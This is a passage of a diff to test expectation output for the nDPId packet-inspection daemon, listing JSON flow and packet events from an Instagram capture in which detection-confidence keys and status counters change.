bJxUnCLu4QeTiZpSHB3cGdOqZ3QRk7jdJJupIE7IbunTdJ01OMhpJ0O7ON3aSOfwekxeD0uW5b1DncnTsA9NJjtugMD53fqZhIgWgSaAtbEsWQtyzLPTnJhkzlli0uis5Bw7O7irEdfDm7Q3o5VwFjvEUYqlhUYWiOMp6HN4L9xoRfHbOtZDzdIqnt5UkurlUXoRcsXKR16897uavZ1aZJAySBM7AzpAoyQRQgyWmsrLZ1OZUcAMdHNE+Pr4jXWjcf5Yn6n5BjRjQdkY2Ci0j2KtwOa\/UpM3ThJRs3xi0n0mLpwZpOEVJkou7MSd02Z3ZFpOEHkgZ06GTuOLuhNJONJONnSQ6khpJwSdxp0k3SkN0kh3Zxu7STU1Wnghs\/P2jYmxyVZaPV5dg9EEcFEMbREli20VTekwDSyB3KDNbYk3lNtwDNIYAe3by0E+sjys0+hryZgbUO7JtFhyPAtU9x0fnXT5Pe0s8iDQmLcK2RFHXhU6XTyJnQ28l6vzLNitasqL77zvTx19X0ci6zQXnPPdfP7MvnHFT+lsL59dHsm\/89emZV6Rwnnza5jdZxo6r1zovBcxn0zk+Fuz0rN88YOj54WAHVCQZESpRo6asDUEg+pcTzW\/zOv0wrwT2tqjD9I4GWD0GFZpn3V3jttz7jDCvpQgFzWGnoul5+tsu35+PE65+hGeTZlT7uR8ydJvn72\/jvpsaaqz69ctVZ2lpLKT0oqTAk8hxUkhJOCdONJONpJwUoyTdncE6dNSUk25Pb4401KwD+XrjwXoWViQow+4a5bP6vJ0nnR9YKwCs6sKb6awPu58RHXNxxs1uwH0ZoswO2Gbbm0i2IA2jMsDvRdUaULFs2KwzolWtLXv2s7q0nGSLJCq2zNhzG32cRjcZ5mHvkvmnpYZ\/G44avfLzN1IbE7nlky\/T\/MstLZrG1W\/PSfZOu5d\/ArvpDw\/t5uJCKz6NPKChFXSGiq1p59mmZDDhAbKIjC40UhbGFKqLSdOLO4MkkfQh1cJjj+O9GqqPQOf5vU87txCsYGo7vZ879onVefdz8yDmjOv7+Tz\/pFy8v0="} 02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1436720942592,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAJAADkG3jFSVRqiwKgAZwBQ4sRSEFIWL7VmbIAQAghpXgAAAQEIClYL0tgAA\/vKkxiut5qB26Ow9Pj8+yfWMCa4DUGy+Ho3+c5jmKfpvReNdKH0EH5lbcbz+eZjXvWt849W37RLwLcqfYn89ApepLzJrn01eX8qj3x\/Byg9vl4hMftksS8eq4V9yQ9dg87nd3j8t6NPn9HZ78M8\/m15\/SI4iV0+Hr5YZdJFWiriRaANGqKgC2yBU5D1y9AGO5LwC+hZAOnTCa0b8GSfSXc3ZK6AUI8M2\/RlL0N3AaXqkYlae70WFvXE\/MysjfHhicTX059\/nyudDYrqom8O\/SwbXeAYWCl2HDbeHOmh0nFvU+hbHnPQ5vucrmudw17ngsyPVk8VHSYNOA4HAkiaZ9LkB4VlFV6oQoQoqHF7YpwjYwQuo3UsJOh\/RGPbfOPDFikaxDY4DU5OkkXmo2bPofj3YqtI3A2tMe8H5Nt8O55y1B5\/7N5\/Hj7N63x3O1z+g38A6wXb+eEc9NDyaVW6IJldX6R5B6ZmuRoJAaDtPubZt\/FrO\/ofNxI07nn+e9Kt8ed1WPUA43vniOOoe+MdtjoYlp8vJuziWF9ZSfTEwvQuT1MrucEnl3NmPfozec2Q8b4rocvm7XZ0ZulcvKtUOGRAQ4+gnWZDVgPNWhEKtHOpze6ZyDRXdX8BKT0GfAkRXbz40uX19WJqIDO0OmFTszkplJub3z+cPQ\/JvQ6z862sGNz1mVnCXPSY4Ty9OzHqpGSzpKihVIIPNmVKcRNOqLCYDILVVeEY398LgV1vOVI9RE0wT4QEQJpSDAaZU3nNoOD251yCtoLfS5daqb9QCMzcp43dzem6ufhS6Oew6aI6IVlfacgTJtbFeleWXZh0ue8o8\/FVehcsDozfPVyqd2beAaLdw7AEWuPBsy\/NtRo7nK6amwzE7wely5\/Li6bHG7EM3mel42aI9A86edPRMPG0Ly9C4IXGVdSXyWneZ42VsFYuj6kTogdbNyRn62pnUvPuruzMr3A+oweXcoviYt9jgW6815zm+k8\/tAB\/OBUuybA1gvm903GUlLnZS6ZF4KFr24FYdVfxNcHoN\/nFir0ejjdiS\/RN6WHm6VtwnvhPbN\/CPbfkffMXtuX3qjh3relJQiEoMQKEpOyKasJqDId1NjV21hXC6QDvdJEJVO1s\/Q\/zN6OTm8v3oOGonI9l57alQUrkXYpZMcsGthFgcg05VXIYrOJRhIhUfQ\/A63I8zG3eKzunHr8oC2NDAbQaOkGxtKX2WhycdMdrn93jLkKuKz3vZ9JmVLTQZa3BEZ0bqBxVlISUosM18C1LstzjfR8zjgcXvgyeor56XydIvT6GCMTACyMtUrgCKhlE19BSC9tDF2gkO5dOOJom5fPt2VnLbnJsVlaDDEPHHuS8fSny7ebZ3qPK2w9TgzU+rEx8ulpAaNFzDbyos643zk7Ou5p5O+X0FYusqEnp3Q6dbPtiuk0uU14ejc98q24cupIjGzSHlDhtF575ZOO+XSVH4SnEqKawNGGtZiJmIRtjEC5UnTQtnUn51xEfWfPtM8B7b2wbSKwHWlcGMSfEWVosImWLXNObHxqcs3YBBYOiCN6LkB4epBLK0KLAqqCHVFoZN\/S\/La3Ded0EcjPZ3z3AN\/GxrIy9iG8YgvWH1PnkuwzLWQPtqlhubqs540iAhZVVsNHpgy+LaCMldVgpipyGjRNCQdSLo8zK5\/dN6RMPzzXjRmF7eCA9vW05aci1898xYkdUwXtNbK2ik7MtyrTKySLWrnk2azz+9hky9fQzRuXXXQYOOm8sLU6Mz+T6DMig+c38yaBw+rLTxauj59VjG6rUoWWXRciQb8rJMP0s6wZdhrOeI1OpspY+oXQgyBjtBm3CyFWZNgavivsvzz15cAGTDTH0Hz\/1jzPKsrUpltBIzz0jO0ZWIpZqARY="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720950909,"flow_last_seen":1436720950909,"flow_idle_time":7580000,"flow_min_l4_payload_len":1398,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1398,"flow_avg_l4_payload_len":1398,"midstream":1,"thread_ts_msec":1436720950909,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -149,23 +148,23 @@ 02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1436720952555,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720952555,"pkt":"QPMIw47hABsv8H60CABFAAW+RXZAADMGTWsCFuwzwKgAZwBQrHcqB6BM6nVWeIAQAeZ8mQAAAQEICmBlKDgAA\/+vtV20fc9mrp1dM1zdmjppSPVtJK34O3VnVq0beVF65xNDXtnFMscw0gMAAAA0IoJBUBRFARUHcs5g82pbGbtawVs6OSKR1bUyvV0dTgqje3NxuXVMt1wlAegfPgme8KPvNkyz2Nzpho206rca8VQBcVDdd9H2q16p8Xe1\/FGG0PnMFm95yjbzbc7y6uXqTNGzWHDjlr1zbmh3aAiPRz9FJQBKIrBUUFyxyAyxUMbqpW7M7s+HSqN8+tay6O9jTtj28wUzIo\/I9c7sc2SRY7SGir2ou5wYpBHamL2VXdh1GOfOiG2KSWK0ZRWURgMc8c2dLwzO6PYryxPPJ14tXbyVLEzu7AiS6csbmt9Otxqax6NG+4uWLSiIMYORwY5GrXsyVyji63ZEef2CRuZlT9tVLFa7rpa4rN2GvKa6elt72n7oBKscxMtLQoy7qN1yh+eGrfONLhtDQAwAAEA0gCRQARQaoCLnm9fzqjnZ3VrTw09XILe19+jPTt59nHFRbU0OOuNydnD0UHny+qEQy39QN7UThl7edlc1nfdBowRUELhmGc+r+yWewvFPtPxXnpDZ1BZmRK8zLPQ38W8W\/X1YhH8M9eufC2d\/AOI79G+kqiNKqKAqKC5YqC5IoY3XSd0Z3Y8akkew1rnv4HkTku3FOmJHHJJtncsjjclx1kPn70JQGkcLY6tNQ0zKJTVjWvXtSZIzLIrSwjEmjQ8c8c2dDq1OqPYLu39fJ1betucGQOPuDRUSXa1cLIpt3N2mddd7Y5VNmsbw2Da2\/vbQiUjZHiNOuRQ2ZSRqRNXXUTanbbp9PbdNN2jY6tLkwRT\/ANjbmOa9UE6Uotjv45c4hUhaamqOkXoyhy4okgDYACCgaABAAIoAADuWUw2fta4zKI7NJxuGVLi29HLne+NvcdlxB1aHHXK2+xtdVSUBfVAg1XrRV5tTjh624ct8i+wPNScORUqMc8Mwy9A0D69VT7xd7V8U53E5jD5vecyw6sYrVuz2BjjtWSJ8nbzbRwtr0xDjG\/RvaURWshFABQXLDMBUUMbnpi4stLLjsnZ8NankEdmWkdab9Muk5DH3nTO4pEwOWG8yo2aQrXLjZXdiuNM0hcyDVu59yGWKyiLXOcZkMeVY7MM2dDs0OqPZPZydXJ159bc5NQmJyqJ1n3Y9HE20x57YdM68dmx\/qZ\/xubZFscff4rR1u4z59Nv1lM66iJZ3x2S6YP1M3XSpWVsVDbdy6xp4Yopxy1ire9NXUDdH5QwofuPrbhV5y8si6MKyVFHiAwABRANQgJRFAEAFRQtucQmaM4mXub5p95Oznuefj688r5I9Io3NRJy4pPrlN+ht2Ku6h\/QXn5ptuulbZCyuVgkTcvo6\/Kxzrz2meGueGWOSOn3F4n9xzTh4w9X+ac6rWdQ67Ljk1S7rhwtJ3i1X+cw4WoLju5KMI5Io4ONbtW2kog1kACqiguWGYCooYz6ATTO7t5HXhw1qebQF2qZdp0cidTv0Xe9srme4048++yBSFg0z42SRtNxxS2IytrHPX1Ij8Vk7Fa5o\/JWGa5s9+xmDrx9qPYDw1O\/L1a89e2KisZlDBefSxSPipRRjkzbpFVvfK43E7weGqLi0clcfofITO4hnvIobM4rryyF2jrvNWRSt60dFarYqu52R3e5aM9G\/a4brng6ZBkiCt702S5fDbSrWoq\/NToyhaKjMRAFBAUANYAkUAEUBFQHbM3h00ta4zJY\/J3bGvNV08O1ZZGZNGYqLS2JzrXKQObG9Rfd54v2gqlsvGjrpY\/dvL3jmUMnMFz0834bMNsda54g8+w\/HfreHt8+XvQ8OvrspC67h\/dIPKIblw4peerNFqYI1OTSaIwPLKqjmzXmxQGlXFQVcVBVxyBVxUM4="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7580000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1436720952561,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1436720952561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAABZAuBAAEAGAfDAqABnLiFGn+VCAbsSlgM32Tfr4YAYA4n5fAAAAQEICgAD\/7VWGIoUFQMBACAs4KplPbzXnvu9o5LJf4SK8seDxrub6gsxIshtI3HaOA=="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7580000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1436720952561,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7580000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1436720952561,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1436720952561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAAA0AuFAAEAGAhTAqABnLiFGn+VCAbsSlgNc2Tfr4YARA4k19gAAAQEICgAD\/7VWGIoU"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1436720952563,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1436720952563,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1436720952563,"pkt":"ABsv8H60QPMIw47hCABFAABH\/7VAAEARadHAqABnCAgICGn0ADUAM87BrqQBAAABAAAAAAAACHBob3Rvcy1iAmFrCWluc3RhZ3JhbQNjb20AAAEAAQ=="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1436720952563,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"photos-b.ak.instagram.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1436720952563,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"photos-b.ak.instagram.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720952611,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1436720952611,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720952611,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC\/YuIUaWwKgAZwBQn5dVkK9h7WtuhaASOJDXwwAAAgQFlgQCCAoJIvhRAAP\/swEDAwU="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1436720952611,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952611,"pkt":"ABsv8H60QPMIw47hCABFAAA0kThAAEAGc8XAqABnLiFGlp+XAFDta26FVZCvYoAQAOU17QAAAQEICgAD\/7oJIvhR"} -00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":745,"packets-processed":743,"total-skipped-flows":0,"total-l4-payload-len":515476,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":27,"total-detection-updates":16,"total-updates":0,"current-active-flows":32,"total-active-flows":32,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":162,"global_ts_msec":1568796253770} +00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":745,"packets-processed":743,"total-skipped-flows":0,"total-l4-payload-len":515476,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":27,"total-detection-updates":15,"total-updates":0,"current-active-flows":32,"total-active-flows":32,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":161,"global_ts_msec":1568796253770} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796253770,"flow_last_seen":1568796253770,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1568796253770,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796253770,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDLAbuZigajAAAAALAC\/\/8cPAAAAgQFtAEDAwYBAQgKDXByoQAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1568796253782,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796253782,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wMv1rwrBmYoGpKASbHB3qgAAAgQFeAQCCAo6Lg6wDXByoQEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1568796253784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796253784,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDLAbuZigak9a8KwoAQCAwKkgAAAQEICg1wcq86Lg6w"} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796253770,"flow_last_seen":1568796253784,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1568796253784,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":750,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1568796253770,"flow_last_seen":1568796253798,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1610,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1568796253798,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796253770,"flow_last_seen":1568796253784,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1568796253784,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":750,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1568796253770,"flow_last_seen":1568796253798,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1610,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1568796253798,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254514,"flow_last_seen":1568796254514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254514,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1568796254514,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254514,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDNAbsBxqpOAAAAALAC\/\/8NqAAAAgQFtAEDAwYBAQgKDXB1TAAAAAAEAgAA"} 